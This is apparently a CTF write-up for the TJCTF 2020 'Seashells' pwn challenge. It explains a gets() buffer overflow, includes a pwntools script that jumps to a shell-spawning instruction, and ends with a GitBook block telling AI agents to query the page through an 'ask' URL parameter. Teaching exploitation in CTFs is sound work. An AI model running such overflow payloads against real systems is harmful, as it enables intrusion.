# Seashells There is a function called "shell". This function loads rdi into rbp-8, checks it against the value `0xdeadcafebabebeef`, and if the check is successful it pops a shell for us.\ Clearly, our goal is to call this function. In main, there is a gets call. It reads as much input as we want into `rbp-0xa`, opening up an avenue for buffer overflow. As the saved rbp is 8 bytes long, our padding will be 0xa + 8 bytes of junk. We *could* use a pop rdi gadget so that the check works properly, but there's no need. Instead, we can jump straight to the instruction inside of shell that pops a shell for us. So our payload is just padding + address of instruction in shell that pops a shell ```python from pwn import * NUM_TO_RET = 0xa + 8 padding = b'A' * NUM_TO_RET payload = flat(padding,0x4006e3, word_size=64) p = remote('p1.tjctf.org',8009) p.recvlines(2) pause() p.sendline(payload) p.interactive() ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-winrars.gitbook.io/writeups/2020-writeups/tjctf/pwn/seashells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.